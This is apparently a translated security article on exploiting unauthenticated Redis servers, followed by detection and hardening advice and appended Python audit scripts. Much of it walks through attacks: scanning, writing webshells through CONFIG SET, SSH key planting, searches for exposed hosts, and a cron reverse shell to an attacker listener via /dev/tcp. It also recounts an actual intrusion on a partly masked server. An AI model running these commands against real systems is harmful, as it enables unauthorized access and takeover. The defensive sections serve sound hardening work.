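Redis is widely deployed at large companies. The author's research found that worm-like automated attacks against Redis instances that allow unauthorized access have already appeared on the Internet. After a successful attack they scan, control and infect the internal network and are used for malicious activity such as cryptocurrency mining and ransomware. An earlier article published online analysed this: "Servers infected with a Linux ransomware variant through redis" (http://www.sohu.com/a/143409075_765820). If your company uses Redis, this deserves attention. Practical research shows that, under certain conditions, an attacker can obtain a webshell and even root privileges.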
1.1.1 Redis overview and building the lab environment
REmote DIctionary Server (Redis) is a key-value storage system written by Salvatore Sanfilippo.
Redis is an open-source, log-structured key-value database written in ANSI C and released under the BSD license. It supports networking, can run in memory or with persistence, and provides APIs for many languages. It is often called a data structure server because values can be strings (String), hashes (Map), lists (list), sets (sets), sorted sets (sorted sets) and other types. From 15 March 2010, Redis development was hosted by VMware. Since May 2013, Redis development has been sponsored by Pivotal. The latest stable version at present is 4.0.8.
1. Redis default ports
The default Redis port is 6379; the sentinel.conf port is 26379.
2. Official site
https://redis.io/
http://download.redis.io/releases/redis-3.2.11.tar.gz
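3. Install redis
wget http://download.redis.io/releases/redis-4.0.8.tar.gz
tar -xvf redis-4.0.8.tar.gz
cd redis-4.0.8
make
Earlier vulnerabilities have been fixed in the latest version; for testing, installing version 3.2.11 is recommended.
4. Modify the configuration file redis.conf
(1) cp redis.conf ./src/redis.conf
(2) Comment out bind 127.0.0.1 by putting a # in front of it
(3) Set protected-mode to no
(4) Start redis-server: ./src/redis-server redis.conf
After the latest version is installed successfully, it looks as shown in Figure 1. The default configuration uses port 6379 and has no password. This leads to unauthorized access, after which files can be written with the privileges of the redis process.
Figure 1 Installing and configuring redis
5. Connect to the Redis server
(1) Interactive mode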
redis-cli -h -p
Connect in this way; all subsequent operations are then performed interactively and there is no need to run redis-cli again. For example: redis-cli -h 127.0.0.1 -p 6379. Adding the -a parameter means access with a password.
(2) Command mode
redis-cli -h -p
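This returns the result of the command directly.
6. Common commands
(1) View information: info
(2) Delete the contents of all databases: flushall
(3) Flush the database: flushdb
(4) List all keys: KEYS *; use select num to view the key data of a database.
(5) Set a variable: set test "who am i"
(6) config set dir dirpath: set the path and other configuration
(7) config get dir/dbfilename: get the path and data file configuration
(8) save: save
(9) get variable: view the variable
For more commands, see the article: https://www.cnblogs.com/kongzhongqijing/p/6867960.html
7. Related vulnerabilities
Because of misconfiguration, Redis can be accessed without authorization: an attacker can reach internal data without authenticating. This can lead to sensitive information disclosure (a Redis server often stores interesting session, cookie or business data whose keys and values can be enumerated with get); flushall can be run maliciously to wipe all data; an attacker can also run Lua code through EVAL, or write a backdoor file to disk through the data backup function. If Redis runs as root, an SSH public key file can be written for the root account, allowing direct password-less login to the server. The related vulnerability information is as follows:
(1) Redis remote code execution vulnerability (CVE-2016-8339)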
Redis 3.2.x
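(2) CVE-2015-8080
In Redis 2.8.x before 2.8.24 and 3.0.x before 3.0.6, an integer overflow in the getnum function in lua_struct.c allows context-dependent attackers with permission to run Lua code to cause memory corruption and an application crash, or possibly to bypass the intended sandbox restrictions, via a large number that triggers a stack-based buffer overflow.
(3) CVE-2015-4335
A security vulnerability exists in Redis versions before 2.8.1 and 3.x versions before 3.0.2. A remote attacker can use the eval command to exploit this vulnerability and execute arbitrary Lua bytecode.
(4) CVE-2013-7458
Reading information from the ".rediscli_history" configuration file.
1.1.2 Redis attack approach
1. Internal network port scanning
nmap -v -n -Pn -p 6379 -sV --script redis-info 192.168.56.1/24
2. Reading the configuration file through file inclusion
The Redis configuration file usually contains the password in plaintext, and during a penetration test the configuration file can also be viewed through a webshell. Redis is often deployed on more than one machine, so it can be used for internal network penetration or for extending privileges.
3. Using a Redis brute-force tool
https://github.com/evilpacket/redis-sha-crack; its command is: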
node ./redis-sha-crack.js -w wordlist.txt -s shalist.txt 127.0.0.1 host2.example.com:5555
This requires node to be installed:
git clone https://github.com/nodejs/node.git
chmod -R 755 node
cd node
./configure
make
4. Exploitation modules in msf
auxiliary/scanner/redis/file_upload normal Redis File Upload
auxiliary/scanner/redis/redis_login normal Redis Login Utility
auxiliary/scanner/redis/redis_server normal Redis Command Execute Scanner
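1.1.3 Redis vulnerability exploitation
1. Obtaining a webshell
When redis does not have high privileges but the server runs a web service and redis has write permission to the web directory, you can try to write a webshell to the web path, provided the physical path is known. The condensed commands are: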
config set dir E:/www/font
config set dbfilename redis2.aspx
set a ""
save
2. Reverse shell
(1) Connect to the Redis server
redis-cli -h 192.168.106.135 -p 6379
(2) Run on 192.168.106.133
nc -vlp 7999
(3) Run the following commands
set x "\n\n* * * * * bash -i >& /dev/tcp/192.168.106.133/7999 0>&1\n\n"
config set dir /var/spool/cron/
On Ubuntu the directory is /var/spool/cron/crontabs/:
config set dir /var/spool/cron/crontabs/
config set dbfilename root
save
3. Password-less ssh login
ssh-keygen -t rsa
config set dir /root/.ssh/
config set dbfilename authorized_keys
set x "\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDZA3SEwRcvoYWXRkXoxu7BlmhVQz7Dd8H9ZFV0Y0wKOok1moUzW3+rrWHRaSUqLD5+auAmVlG5n1dAyP7ZepMkZHKWU94TubLBDKF7AIS3ZdHHOkYI8y0NRp6jvtOroZ9UO5va6Px4wHTNK+rmoXWxsz1dNDjO8eFy88Qqe9j3meYU/CQHGRSw0/XlzUxA95/ICmDBgQ7E9J/tN8BWWjs5+sS3wkPFXw1liRqpOyChEoYXREfPwxWTxWm68iwkE3/22LbqtpT1RKvVsuaLOrDz1E8qH+TBdjwiPcuzfyLnlWi6fQJci7FAdF2j4r8Mh9ONT5In3nSsAQoacbUS1lul root@kali2018\n\n\n"
save
The result is shown in Figure 2.
Figure 2 Password-less SSH login through the Redis vulnerability
4. Searching with vulnerability search engines
(1) Search for "port: 6379"
https://www.zoomeye.org/searchResult?q=port:6379
(2) Exclude results that show "-NOAUTH Authentication required."; this message means authentication is required, i.e. a password is needed for access.
£¨3£©https://fofa.so/
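Keyword search: port="6379" && protocol==redis && country=CN
1.1.4 Obtaining a webshell with a Redis account in practice
1. Scan the port information of a target server
A full port scan of a target server with nmap found that the target exposed Redis on port 3357 (the default port is 6379). The iis put scaner software was then used to scan servers in the same network segment for that port, as shown in Figure 3, which found two servers with the port open.
Figure 3 Scanning the same network segment for servers with the port open
2. Log in to the server with telnet
Log in with the command "telnet ip port", for example telnet 1**.**.**.78 3357. After logging in, enter auth and the password to authenticate.
3. View and save the current configuration
Use the "config get" command to view the dir and dbfilename values, and copy them for later restoration.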
config get dir
config get dbfilename
4. Configure and write the webshell
(1) Set the path
config set dir E:/www/font
(2) Set the database file name
Set dbfilename to a file name with a script type the site supports. For example, if the site supports php, set file.php. In this example it is aspx, so redis.aspx is set.
config set dbfilename redis.aspx
(3) Set the webshell content
Set the webshell content according to the actual situation. webshell is only a variable name; it can be a or any other string. Some reference examples follow.
set webshell ""
// php: view information
set webshell " "
// php webshell
set webshell ""
// aspx webshell; note that double quotes must be written as \"
(4) Save the written content
save
(5) View the webshell content
get webshell
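The commands for the whole process are shown in Figure 4; each command returning "+OK" means the setting succeeded.
Figure 4 Writing the webshell
5. Test whether the webshell works
Enter the name of the written file in the browser and access it as shown in Figure 5. Output similar to:
"REDIS0006?webshell'a@Hÿ²ó???"
indicates that the webshell was obtained correctly.
Figure 5 Testing whether the webshell works
6. Obtain the webshell
As shown in Figure 6, the China Chopper backdoor management tool was used to connect, successfully obtaining the site's webshell.
Figure 6 Obtaining the webshell
7. Restore the original settings
(1) Restore dir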
config set dir dirname
(2) Restore dbfilename
config set dbfilename dbfilename
(3) Delete the webshell
del webshell
(4) Flush the database
flushdb
8. Summary of the complete commands
telnet 1**.**.**.35 3357
auth 123456
config get dir
config get dbfilename
config set dir E:/www/
config set dbfilename redis2.aspx
set a ""
save
get a
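9. View the redis conf configuration file
Through the webshell, redis instances at other addresses were found in the corresponding directory and can be penetrated again with the same method. As shown in Figure 7, the path, port, password and other information are visible.
Figure 7 Viewing the redis configuration file
1.1.5 Redis intrusion detection and security hardening
1. Intrusion detection
(1) Check keys
Log in locally and run "keys *". If there has been an intrusion, there will be many values. As shown in Figure 8, after keys * runs successfully, trojan1 and trojan2 can be seen; run get trojan1 to view the content.
Figure 8 Checking keys
(2) On Linux, check authorized_keys
Redis contains a key named crackit (other names are also possible), the dir parameter in the Redis conf file points to /root/.ssh, and /root/.ssh/authorized_keys has been overwritten or contains Redis-related content. Checking these values shows whether the server has been compromised.
(3) Scan and analyse the website for webshells; a shell planted through the Redis account vulnerability will contain the string Redis.
(4) Investigate and clean up backdoors on the server.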
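The checks in items (2) and (3) can be automated. The following is an added example, not code from the original article: it looks for the RDB snapshot header in files that should never contain one and flags suspicious dir/dbfilename values. The function names, the script-extension list and the sample bytes are assumptions constructed for illustration.

```python
import re

# An RDB snapshot starts with the ASCII magic "REDIS" plus a 4-digit version,
# e.g. the "REDIS0006" seen when the written file is opened in a browser.
RDB_MAGIC = re.compile(rb"REDIS\d{4}")

# Directories and file names that show up as CONFIG SET targets in this article.
SENSITIVE_DIRS = ("/root/.ssh", "/var/spool/cron")
SENSITIVE_NAMES = {"authorized_keys", "root"}
SCRIPT_EXTS = (".php", ".aspx", ".asp", ".jsp")


def rdb_residue(data):
    """Return the RDB header found in data (e.g. 'REDIS0006'), or None."""
    match = RDB_MAGIC.search(data)
    return match.group().decode() if match else None


def scan_files(files):
    """Map path -> RDB header for each file that carries snapshot residue."""
    found = {path: rdb_residue(data) for path, data in files.items()}
    return {path: header for path, header in found.items() if header}


def audit_persistence(dir_value, dbfilename):
    """Flag `config get dir` / `config get dbfilename` values that need review."""
    findings = []
    d = dir_value.rstrip("/")
    if any(d == s or d.startswith(s + "/") for s in SENSITIVE_DIRS):
        findings.append("dir points at " + d)
    name = dbfilename.lower()
    if name in SENSITIVE_NAMES:
        findings.append("dbfilename is " + dbfilename)
    if name.endswith(SCRIPT_EXTS):
        findings.append("dbfilename has a script extension: " + dbfilename)
    return findings


# Constructed samples: one clean authorized_keys, one overwritten by a snapshot.
SAMPLES = {
    "/home/deploy/.ssh/authorized_keys": b"ssh-ed25519 AAAA-PLACEHOLDER deploy@host\n",
    "/root/.ssh/authorized_keys":
        b"REDIS0006\xfe\x00\x00\x07crackit\x10\n\nssh-rsa PLACEHOLDER\n\n\xff",
}

if __name__ == "__main__":
    print(scan_files(SAMPLES))
    print(audit_persistence("/root/.ssh/", "authorized_keys"))
```

On a real host, feed scan_files the bytes of every authorized_keys file, crontab file and web-root script, and feed audit_persistence the live output of config get dir and config get dbfilename.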
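2. Remediation
(1) Do not expose the Redis port to the public network; the Redis port 6379 can be blocked on the firewall.
(2) Check whether authorized_keys has been tampered with. If it has been modified, regenerate and restore it; do not use the modified file. Then restart the ssh service (service ssh restart).
(3) Add Redis password authentication
First stop the Redis service and open the redis.conf configuration file (the path may differ between installations), /etc/redis/6379.conf. Find # # requirepass foobared, remove the leading #, change foobared to a password of your own, and restart the redis service.
(4) Modify the conf file to forbid access from the whole network: open 6379.conf, find bind 0.0.0.0 and put a # in front of it (forbids access from the whole network).
3. Reference hardening settings
port: change the default port that redis uses
bind: set the dedicated IP that redis listens on
requirepass: set the password for redis connections
rename-command CONFIG "" # disable the CONFIG command
rename-command info info2 # rename info to info2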
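The hardening settings above can be checked mechanically. The following is an added example, not code from the original article: it audits the text of a redis.conf for bind, protected-mode, requirepass and rename-command CONFIG. The function names and both sample configurations are constructed for illustration; treating a missing bind directive as a finding relies on Redis listening on all interfaces when none is given.

```python
def parse_conf(text):
    """Return (directive, args) pairs for the active lines of a redis.conf."""
    pairs = []
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#"):
            parts = line.split()
            pairs.append((parts[0].lower(), parts[1:]))
    return pairs


def audit_conf(text):
    """Check the settings named in the remediation steps; return findings."""
    conf = parse_conf(text)
    values = lambda key: [args for k, args in conf if k == key and args]
    findings = []
    binds = [addr for args in values("bind") for addr in args]
    if not binds or "0.0.0.0" in binds:
        findings.append("bind: listening on all interfaces")
    if any(args[0].lower() == "no" for args in values("protected-mode")):
        findings.append("protected-mode: disabled")
    passwords = [args[0] for args in values("requirepass")]
    if not passwords:
        findings.append("requirepass: not set")
    elif "foobared" in passwords:
        findings.append("requirepass: sample password foobared in use")
    renamed = {args[0].upper() for args in values("rename-command")}
    if "CONFIG" not in renamed:
        findings.append("rename-command: CONFIG is still available")
    return findings


# Constructed samples: the lab configuration from section 1.1.1 and a hardened one.
WEAK_CONF = """\
# bind 127.0.0.1
protected-mode no
# requirepass foobared
"""
HARDENED_CONF = """\
bind 127.0.0.1
protected-mode yes
requirepass REPLACE-WITH-LONG-RANDOM-SECRET
rename-command CONFIG ""
"""

if __name__ == "__main__":
    for finding in audit_conf(WEAK_CONF):
        print(finding)
```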
(Author: simeon2005)